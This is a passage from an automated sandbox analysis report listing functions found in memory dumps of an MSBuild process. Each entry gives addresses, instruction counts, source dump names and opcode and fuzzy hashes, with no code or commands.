                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067D5260 Relevance: .4, Instructions: 426COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b84cbaf7007d16ea4bf62b2d6109e2de2de4e7f69c9743789cab0e676b6513da
                                                                                                                                        • Instruction ID: 2befa377128346e533e7680d546eb8bcdc060900efd626e5a6a04b87d51b45d0
                                                                                                                                        • Opcode Fuzzy Hash: b84cbaf7007d16ea4bf62b2d6109e2de2de4e7f69c9743789cab0e676b6513da
                                                                                                                                        • Instruction Fuzzy Hash: 54E19D75F002058FEB54DBB8D844AADBBF2EF89215F248969E506DB3A0EB35DC41CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DFA38 Relevance: .4, Instructions: 385COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 483f60cb07db04141e43f02cfd6e915fda5b07e29b3055054c0d86a3494f11d6
                                                                                                                                        • Instruction ID: bbb559e385ee3102fb93267d5114a7726f44a983dd9c714eed65bf105798f59f
                                                                                                                                        • Opcode Fuzzy Hash: 483f60cb07db04141e43f02cfd6e915fda5b07e29b3055054c0d86a3494f11d6
                                                                                                                                        • Instruction Fuzzy Hash: 78E18730A00214CFCB64EFB4D458AADBBF2EF88355F158969E40A9B390DB399C05CF94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0105DFE2 Relevance: .4, Instructions: 370COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.525700668.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_105d000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2c0f57051427a9e49287e2431128486fa73639a7b78fe4a9449db4bef2b4b6bf
                                                                                                                                        • Instruction ID: b7731d7b8ab2afd7a531d4dd462325efa34ac7eb38759d4dadb78a3ae05699c2
                                                                                                                                        • Opcode Fuzzy Hash: 2c0f57051427a9e49287e2431128486fa73639a7b78fe4a9449db4bef2b4b6bf
                                                                                                                                        • Instruction Fuzzy Hash: 045133B240D3C19FD7439760C8A5756BF70AB13224F1D81DBE9C5CE293D22A994AC763
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067D52B0 Relevance: .3, Instructions: 275COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7b60dafadaaf0538f49da8cb35f47dae19d578005422f5787429faabb98ab798
                                                                                                                                        • Instruction ID: d7a800f843c6dde76ca347e721934bfa4e103c7d1506e0d84923d66f2e8ad674
                                                                                                                                        • Opcode Fuzzy Hash: 7b60dafadaaf0538f49da8cb35f47dae19d578005422f5787429faabb98ab798
                                                                                                                                        • Instruction Fuzzy Hash: 8591C071F042068FEB50DBB8D8447AEBBF2EB85214F248876E509DB251EB34DC01CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DCB00 Relevance: .3, Instructions: 253COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c235b034095e8d633f16739bf193f6b3438cf53766a721e51e2370d09faf3f9a
                                                                                                                                        • Instruction ID: 75ee0e7dd430aa7df327385d8509b8e9a67156e313df9009eecf0d401529c480
                                                                                                                                        • Opcode Fuzzy Hash: c235b034095e8d633f16739bf193f6b3438cf53766a721e51e2370d09faf3f9a
                                                                                                                                        • Instruction Fuzzy Hash: 72A19075A04249DFCF06CFA4C844AEEBFB6FF89300F148959E905AB2A1D734D855CBA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067D59C8 Relevance: .2, Instructions: 206COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 65e43325e396311cd50fcdadee3752a5adb3c35fa175e115911e67c9476aaada
                                                                                                                                        • Instruction ID: ae07e0c954f9a752b47bfde77b54f64d17d5fb9c01a50978ef0fd4a40b69121a
                                                                                                                                        • Opcode Fuzzy Hash: 65e43325e396311cd50fcdadee3752a5adb3c35fa175e115911e67c9476aaada
                                                                                                                                        • Instruction Fuzzy Hash: 3671E230F002418BEB648F78C8447ADBBB2EF85344F24C66AD5599F3D9DB768845C791
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DC7E0 Relevance: .2, Instructions: 201COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e992ccaea2e8eaf67874eb15d0996d6fc4b49d7cc648512bb8e263173c2bbeb0
                                                                                                                                        • Instruction ID: 8ad68fe3f1ef73a9fd5f053b8be45aced19e69a0060c3cbd8d2b3b0c874d3610
                                                                                                                                        • Opcode Fuzzy Hash: e992ccaea2e8eaf67874eb15d0996d6fc4b49d7cc648512bb8e263173c2bbeb0
                                                                                                                                        • Instruction Fuzzy Hash: BB714A34B002058FDB56DF68C898A7E7BF9AF49604F1948AAE805CB3B1DB74DC41CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DED68 Relevance: .1, Instructions: 131COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d5658336de58d993a51f30953bc58c75ead442be8567070f621ea3ebcb0eb6f2
                                                                                                                                        • Instruction ID: 27889c9217a7325f229690af037b348e2f301e7ba4fdeb844f76ca48a05f0b79
                                                                                                                                        • Opcode Fuzzy Hash: d5658336de58d993a51f30953bc58c75ead442be8567070f621ea3ebcb0eb6f2
                                                                                                                                        • Instruction Fuzzy Hash: C551137DD01359DFCB40EFB5E89598DBBB2BF48304B118A26D418AB328DB346951CF80
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DED78 Relevance: .1, Instructions: 125COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a8eb09e63898bdd5177110df40aa92f013519e172521bd1687f9593245793c2d
                                                                                                                                        • Instruction ID: 3a220ab378e4675480bdb4dbfca7f0284ef61f60faf61a8fc056eb32f0083a55
                                                                                                                                        • Opcode Fuzzy Hash: a8eb09e63898bdd5177110df40aa92f013519e172521bd1687f9593245793c2d
                                                                                                                                        • Instruction Fuzzy Hash: 3651F27DD01359DFCB40EFB5E89598DBBB2BF48304B118A26D419AB328DB346951CF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DCC53 Relevance: .1, Instructions: 122COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3394eed60ab43782d927b4bbb5bcd501632cd3cb365fe2abb4a56ca5c7cb09e7
                                                                                                                                        • Instruction ID: a045f080fb95525f56c6842b6e23d8a123daf15ff6196c86f9b4dc59402678c1
                                                                                                                                        • Opcode Fuzzy Hash: 3394eed60ab43782d927b4bbb5bcd501632cd3cb365fe2abb4a56ca5c7cb09e7
                                                                                                                                        • Instruction Fuzzy Hash: ED41C231A04249DFDF52CFA4CC44AAEBFB6FF49310F048955E915AB2A1D335E924CBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0105E087 Relevance: .1, Instructions: 90COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.525700668.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_105d000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: be61d2d9925a8b88b00e77b3f202f69b198358230ab060c3a436f8f476268f73
                                                                                                                                        • Instruction ID: b3fb2984c166140f04cb55e999564738c335e38f3021afe42dcf9e2735b5a6df
                                                                                                                                        • Opcode Fuzzy Hash: be61d2d9925a8b88b00e77b3f202f69b198358230ab060c3a436f8f476268f73
                                                                                                                                        • Instruction Fuzzy Hash: CA31A2755093809FD743CB20C890B56BFB1EF46214F18C5DBD8C98B693C33A994ACB62
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0104D3EC Relevance: .1, Instructions: 75COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.525388724.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_104d000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e7fba50ddfc95591d2e172cf18d170e7ea34478ed82aa122ca9f8db7b60f04a5
                                                                                                                                        • Instruction ID: aac3a8c459e92addd9e8cd3a2292503fc17152cd792c807ce7fc265793a31442
                                                                                                                                        • Opcode Fuzzy Hash: e7fba50ddfc95591d2e172cf18d170e7ea34478ed82aa122ca9f8db7b60f04a5
                                                                                                                                        • Instruction Fuzzy Hash: 5121F1F1504244EFDB01DF94D8C0B6ABBA5FBE4324F24C5B9E9494B206C736E856C7A1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0105E3F0 Relevance: .1, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.525700668.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_105d000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c5a79a283804a138ed54d00fbcb87d99c7b735d8c95ad000b7a312964f2bc754
                                                                                                                                        • Instruction ID: d42f1be09bab09ce9e5c69bba4dbd202b00e0e9a691516432324c42d72dedee0
                                                                                                                                        • Opcode Fuzzy Hash: c5a79a283804a138ed54d00fbcb87d99c7b735d8c95ad000b7a312964f2bc754
                                                                                                                                        • Instruction Fuzzy Hash: 1D2103B1604244AFCB85DF14D8C0B2BFFA5EB84314F24C9A9EDC94B246CB36D946CA61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0105E4D8 Relevance: .1, Instructions: 71COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.525700668.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_105d000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6f59fbcc6612eb511ddc441c2dbff19acf3966885d0e6235d3064b24943d0e7d
                                                                                                                                        • Instruction ID: e69551108bff03ddca4f2b79a44479df75892855abe6f847ed7d4a1ff5c3bbaf
                                                                                                                                        • Opcode Fuzzy Hash: 6f59fbcc6612eb511ddc441c2dbff19acf3966885d0e6235d3064b24943d0e7d
                                                                                                                                        • Instruction Fuzzy Hash: E92122B1504240DFDB85DF14C4C0B2BFBA5FB84218F20C6ADE9894B242E736D946C662
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067D59C1 Relevance: .1, Instructions: 68COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: dcf28313201249ba5b460d8b33ad21aa4f2cd6568bf687fd5547a4a130b7520a
                                                                                                                                        • Instruction ID: 39dc12a339931444b307dfdbd365fc26d223a202cc2c92e3dd8e53c15802b632
                                                                                                                                        • Opcode Fuzzy Hash: dcf28313201249ba5b460d8b33ad21aa4f2cd6568bf687fd5547a4a130b7520a
                                                                                                                                        • Instruction Fuzzy Hash: F8215A20E0438087EBB58B7D858436D7FA2DF92288F28C59AC09D4E6DED777C4468362
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067D8D91 Relevance: .1, Instructions: 67COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 92b9fcbc56d26a7c88c8926f224a16ada408174ef1b77ab26b109b8f7ea573c2
                                                                                                                                        • Instruction ID: f90339571faeace6e9e4bb206ca0b63e3fbb36bf298d3165d9fdc0dde00ac697
                                                                                                                                        • Opcode Fuzzy Hash: 92b9fcbc56d26a7c88c8926f224a16ada408174ef1b77ab26b109b8f7ea573c2
                                                                                                                                        • Instruction Fuzzy Hash: 7A212171E102098BDB20DFA9D8807EEFBF4FB49360F188D29E009EB344C631E8408B60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0105E0C2 Relevance: .1, Instructions: 66COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.525700668.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_105d000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 990ac1e02c9cb997867fe20ae019031cb38219d09f64f0fac9abaf2bbafc70f0
                                                                                                                                        • Instruction ID: 4add966f0e1fc5543bbf910b8828c832a4e2e193b5870a3c324c64f2ca37f4bb
                                                                                                                                        • Opcode Fuzzy Hash: 990ac1e02c9cb997867fe20ae019031cb38219d09f64f0fac9abaf2bbafc70f0
                                                                                                                                        • Instruction Fuzzy Hash: C821AE765042809FCB42CF24D584B26FFA1EB45214F28C5EAEC898B257C73AD50ACB52
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DCD38 Relevance: .1, Instructions: 59COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b984af86d0f09c9237a901ce273ac22cdf32561129b9aed644390ec4be1ffe62
                                                                                                                                        • Instruction ID: e49f5fc42c927f1179278975c1a180921043677ab582bbe5dc8df6f6976ce4dc
                                                                                                                                        • Opcode Fuzzy Hash: b984af86d0f09c9237a901ce273ac22cdf32561129b9aed644390ec4be1ffe62
                                                                                                                                        • Instruction Fuzzy Hash: A211B671A002459FDB52CF68CC45B9FBFBAAF85360F148A55D518AB292D371F820CBA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0105DCE9 Relevance: .1, Instructions: 57COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.525700668.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_105d000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 38b388560ef94409013a7c28d768289ddf1fb52787263361fdf4558150cd3743
                                                                                                                                        • Instruction ID: 2361463b177c80c732d1ab3bd25caf2d6ab0aef3e9094c75cee11fa8a0249e50
                                                                                                                                        • Opcode Fuzzy Hash: 38b388560ef94409013a7c28d768289ddf1fb52787263361fdf4558150cd3743
                                                                                                                                        • Instruction Fuzzy Hash: ED118B754042809FDB42CF20D580B26FFA1FB85224F24C6EAEC894B656D336D51ACB92
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0104D3E7 Relevance: .1, Instructions: 56COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.525388724.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_104d000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5bf02d69050becd3d46a1a83d3057079996056aa0a7a8d5a39dcc4e83b01ae8c
                                                                                                                                        • Instruction ID: 93dd3e7129d22a79f16b783a92d68ee9143dc2c69bd75f84afb2c4829468601a
                                                                                                                                        • Opcode Fuzzy Hash: 5bf02d69050becd3d46a1a83d3057079996056aa0a7a8d5a39dcc4e83b01ae8c
                                                                                                                                        • Instruction Fuzzy Hash: FC11B1B6504280DFCB02DF54D5C4B56BFB2FB94320F24C6E9D8480B656C33AE45ACBA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DC468 Relevance: .1, Instructions: 56COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b39255f7344805afc1480af8660796923146f19e36a67d55fa76501d45ee2573
                                                                                                                                        • Instruction ID: 3576456a31bedbd1e959ac98d6d2838ca3238f5b35079a4d910dc6043e82d85f
                                                                                                                                        • Opcode Fuzzy Hash: b39255f7344805afc1480af8660796923146f19e36a67d55fa76501d45ee2573
                                                                                                                                        • Instruction Fuzzy Hash: 8311CE31B001249FDB56DE14D848B7EB7BAEB84721F14C929E80ADB290DB70D891C791
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0105E4D3 Relevance: .1, Instructions: 52COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.525700668.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_105d000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c6d465ef8171fff35dfc6a644cbace5c4fc03a803d7bc861613aa013409842f6
                                                                                                                                        • Instruction ID: 7db86d1aca205f31f1525553bd893c8cb784b9689930c3a53417ca91e8e5f372
                                                                                                                                        • Opcode Fuzzy Hash: c6d465ef8171fff35dfc6a644cbace5c4fc03a803d7bc861613aa013409842f6
                                                                                                                                        • Instruction Fuzzy Hash: 3B11EF75904280DFDB42CF14C5C4B16FFA1FB84318F24C6ADD8894B656D33AD54ACB51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DFED8 Relevance: .1, Instructions: 52COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7d3101d62d3bbcbd6f7e6802372834b6caa615d45ebd4df71e1b49c0d13951a4
                                                                                                                                        • Instruction ID: d5d162c228807387f3aa97357a48dd8e547e7d1270bac8e97c9a7277fdc15536
                                                                                                                                        • Opcode Fuzzy Hash: 7d3101d62d3bbcbd6f7e6802372834b6caa615d45ebd4df71e1b49c0d13951a4
                                                                                                                                        • Instruction Fuzzy Hash: 3D117C75F001298F8B80EBB8C84499EB7F5EB892007508969D24AE7354EB389C028BA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DF3A0 Relevance: .1, Instructions: 52COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 74f893922a78175fdf1ffc96a1cffb7040ea9d25c2db566fb4d4a79f536ce885
                                                                                                                                        • Instruction ID: cabec183ba4c1d688de8a895a755266dd89aa839166f0df5360ec256cc03b43e
                                                                                                                                        • Opcode Fuzzy Hash: 74f893922a78175fdf1ffc96a1cffb7040ea9d25c2db566fb4d4a79f536ce885
                                                                                                                                        • Instruction Fuzzy Hash: D8115135F102198F8B40EF78E44999EBBF1FBC87017108525E50AE3354EB385D018B90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DCAF1 Relevance: .0, Instructions: 47COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 346d90e198e62534372aa1713be95a8fcfe90beef1ae1d612b4832f3effa1623
                                                                                                                                        • Instruction ID: 89b2ff27ae11cb364b61d1a5c663beb76740428fb033ef842388fc25fda8f57e
                                                                                                                                        • Opcode Fuzzy Hash: 346d90e198e62534372aa1713be95a8fcfe90beef1ae1d612b4832f3effa1623
                                                                                                                                        • Instruction Fuzzy Hash: CC010275A1025C9FCF14CFE5D8408EEBBFAFF88310F10852AE945AB204D7319A59CBA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0105DBE4 Relevance: .0, Instructions: 45COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.525700668.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_105d000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6453b088759dc8876a86c55933f7c2acffcc8da4e9dbce6005a0ff33b8fecad5
                                                                                                                                        • Instruction ID: 6a727c19d5fafeacbfd7cb1fb230902bd70a93e822c76ae4cb860598aa1f159c
                                                                                                                                        • Opcode Fuzzy Hash: 6453b088759dc8876a86c55933f7c2acffcc8da4e9dbce6005a0ff33b8fecad5
                                                                                                                                        • Instruction Fuzzy Hash: BD117975904240DFDB46DF24D584B26FFA2FB84228F24C6A9D8890A216D33AD55ACA92
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DFF37 Relevance: .0, Instructions: 25COMMON
                                                                                                                                        Download Yara Rule
